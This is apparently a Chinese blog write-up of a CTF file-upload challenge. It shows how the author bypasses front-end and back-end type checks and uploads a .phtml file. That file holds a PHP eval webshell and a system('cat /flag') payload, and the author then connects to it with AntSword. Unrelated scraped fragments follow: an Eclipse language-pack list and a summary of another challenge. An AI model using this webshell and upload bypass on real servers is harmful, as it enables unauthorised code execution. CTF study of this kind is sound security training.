[ACTF2020 新生赛]Upload-1

小编今天又来写文章啦,距离上次写文章过了一个多月,小编前段时间太忙,好久没更新文章了。现在小编回来继续做着安全的题目,这次是一个BUUCTF平台的一到文件上传漏洞题。以下为小编为小伙伴们的解题思路:,

1、题目内容,

鼠标放在灯泡上发现存在文件上传。

2、随便上传一张图片,如下可得图片上传保存的地址,访问试试看

3、试着上传php一句话马文件,出现只能上传图片

4、Burp抓包发现,对文件格式只在前台验证好办多了,思路:先上传一张一句话马图片,抓包将图片尾缀改为php文件,发现原来不仅在前台校验,后台也做了校验。

5、可以创建一个test.phtml文件。对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。将以下代码写入该文件中。

<script language='php'>@eval($_POST['a']);</script>

<script language='php'>system('cat /flag');</script>

(1)删除前台点击校验文件事件

(2)上传含一句话木马的.phtml文件。发现成功上传。

6、访问该文件。空白页面说明上传成功

7、蚁剑连接,并在根目录下 / 找到flag文件,打开可得flag

最后小编希望小伙伴们觉得还不错的话,就给你小编点个赞哈!你的点赞就是我继续前进的动力,大佬,大神,请绕道,不要欺负小编菜啦。

  • 16
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自己下载后整理的,绝对能用, Babel Language Packs for Indigo Eclipse 3.7 BabelLanguagePack-birt-zh_3.7.0.v20110723043401.zip (91.74%) BabelLanguagePack-eclipse-zh_3.7.0.v20110723043401.zip (87.19%) BabelLanguagePack-modeling.emf.cdo-zh_3.7.0.v20110723043401.zip (25%) BabelLanguagePack-modeling.emft.emf-facet-zh_3.7.0.v20110723043401.zip (9.79%) BabelLanguagePack-modeling.gmp.graphiti-zh_3.7.0.v20110723043401.zip (20.45%) BabelLanguagePack-modeling.mdt.modisco-zh_3.7.0.v20110723043401.zip (5.65%) BabelLanguagePack-mylyn-zh_3.7.0.v20110723043401.zip (50.63%) BabelLanguagePack-rt.equinox-zh_3.7.0.v20110723043401.zip (99.27%) BabelLanguagePack-rt.equinox.p2-zh_3.7.0.v20110723043401.zip (22.2%) BabelLanguagePack-technology.actf-zh_3.7.0.v20110723043401.zip (4.46%) BabelLanguagePack-technology.bpel-zh_3.7.0.v20110723043401.zip (21.06%) BabelLanguagePack-technology.egit-zh_3.7.0.v20110723043401.zip (16.84%) BabelLanguagePack-technology.jgit-zh_3.7.0.v20110723043401.zip (2.72%) BabelLanguagePack-technology.jubula-zh_3.7.0.v20110723043401.zip (11.55%) BabelLanguagePack-technology.uomo-zh_3.7.0.v20110723043401.zip (3.6%) BabelLanguagePack-tools.cdt-zh_3.7.0.v20110723043401.zip (68.19%) BabelLanguagePack-tools.gef-zh_3.7.0.v20110723043401.zip (66.21%) BabelLanguagePack-tools.objectteams-zh_3.7.0.v20110723043401.zip (5.51%) BabelLanguagePack-webtools.dali-zh_3.7.0.v20110723043401.zip (18.4%) BabelLanguagePack-webtools.jsdt-zh_3.7.0.v20110723043401.zip (80.48%) BabelLanguagePack-webtools.jsf-zh_3.7.0.v20110723043401.zip (39.7%) BabelLanguagePack-webtools.libra-zh_3.7.0.v20110723043401.zip (26.04%) BabelLanguagePack-webtools.servertools-zh_3.7.0.v20110723043401.zip (88.15%) BabelLanguagePack-webtools.sourceediting-zh_3.7.0.v20110723043401.zip (74.53%) BabelLanguagePack-webtools.webservices-zh_3.7.0.v20110723043401.zip (75.76%)
Eclipse(中文语言包下载地址)Indigo,Helios,Galileo,Ganymede,Europa EclipseJSFMyeclipseLinux Babel Language Packs for Europa 3.3 (MyEclipse 6.5) • BabelLanguagePack-birt-zh_3.3.1.v20101211042632.zip(99.76%) • BabelLanguagePack-datatools-zh_3.3.1.v20101211042632.zip (100%) • BabelLanguagePack-eclipse-zh_3.3.1.v20101211042632.zip (98.09%) • BabelLanguagePack-webtools-zh_3.3.1.v20101211042632.zip (45.28%) Babel Language Packs for Ganymede Eclipse 3.4 • BabelLanguagePack-birt-zh_3.4.0.v20101211020322.zip (99.96%) • BabelLanguagePack-datatools-zh_3.4.0.v20101211020322.zip (100%) • BabelLanguagePack-dsdp.tm-zh_3.4.0.v20101211020322.zip (21.2%) • BabelLanguagePack-eclipse-zh_3.4.0.v20101211020322.zip (99.34%) • BabelLanguagePack-modeling.emft-zh_3.4.0.v20101211020322.zip (24.23%) • BabelLanguagePack-modeling.gmf-zh_3.4.0.v20101211020322.zip (34.18%) • BabelLanguagePack-modeling.m2m-zh_3.4.0.v20101211020322.zip (23.61%) • BabelLanguagePack-modeling.m2t-zh_3.4.0.v20101211020322.zip (24.88%) • BabelLanguagePack-modeling.mdt-zh_3.4.0.v20101211020322.zip (70.07%) • BabelLanguagePack-rt.equinox-zh_3.4.0.v20101211020322.zip (28.93%) • BabelLanguagePack-technology.jwt-zh_3.4.0.v20101211020322.zip (35.45%) • BabelLanguagePack-technology.mat-zh_3.4.0.v20101211020322.zip (3.29%) • BabelLanguagePack-tools.cdt-zh_3.4.0.v20101211020322.zip (83.4%) • BabelLanguagePack-tools.gef-zh_3.4.0.v20101211020322.zip (77.97%) • BabelLanguagePack-tptp.platform-zh_3.4.0.v20101211020322.zip (18.88%) • BabelLanguagePack-webtools-zh_3.4.0.v20101211020322.zip (82.37%) • BabelLanguagePack-webtools.sourceediting-zh_3.4.0.v20101211020322.zip (85.13%) Babel Language Packs for Galileo Eclipse 3.5 • BabelLanguagePack-datatools-zh_3.5.0.v20101211082259.zip (86.23%) • BabelLanguagePack-dsdp.mtj-zh_3.5.0.v20101211082259.zip (25.09%) • BabelLanguagePack-dsdp.tm-zh_3.5.0.v20101211082259.zip (24.79%) • BabelLanguagePack-eclipse-zh_3.5.0.v20101211082259.zip (96.21%) • BabelLanguagePack-modeling.emf-zh_3.5.0.v20101211082259.zip
鉴于提供的引用内容,\[ACTF2020 新生\]BackupFile 1是一道题目,它涉及到备份文件的寻找和查看。常见的备份文件包括“.git”、“.svn”、“.swp”、“.~”、“.bak”、“.bash_history”、“.bkf”。可以使用dirsearch工具进行目录扫描,找到备份文件的位置。然后访问该链接,下载文件并打开查看。在这个题目中,打开的是一个PHP文件,其中包含了一个弱类型比较的逻辑。通过让key=123进行访问,可以看到flag。\[1\] 源码中的逻辑是,如果存在$_GET\['key'\],则将其赋值给$key。如果$key不是一个数字,则输出"Just num!"。然后将$key转化为整数,并与字符串$str进行比较。如果相等,则输出$flag。否则,输出"Try to find out source file!"。\[2\]\[3\] #### 引用[.reference_title] - *1* [[ACTF2020 新生]BackupFile 1](https://blog.csdn.net/qq_44122254/article/details/125927517)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[ACTF2020 新生]BackupFile1](https://blog.csdn.net/m0_73728268/article/details/129497240)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [BUUCTF-[ACTF2020 新生]BackupFile1](https://blog.csdn.net/qq_46918279/article/details/120619373)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值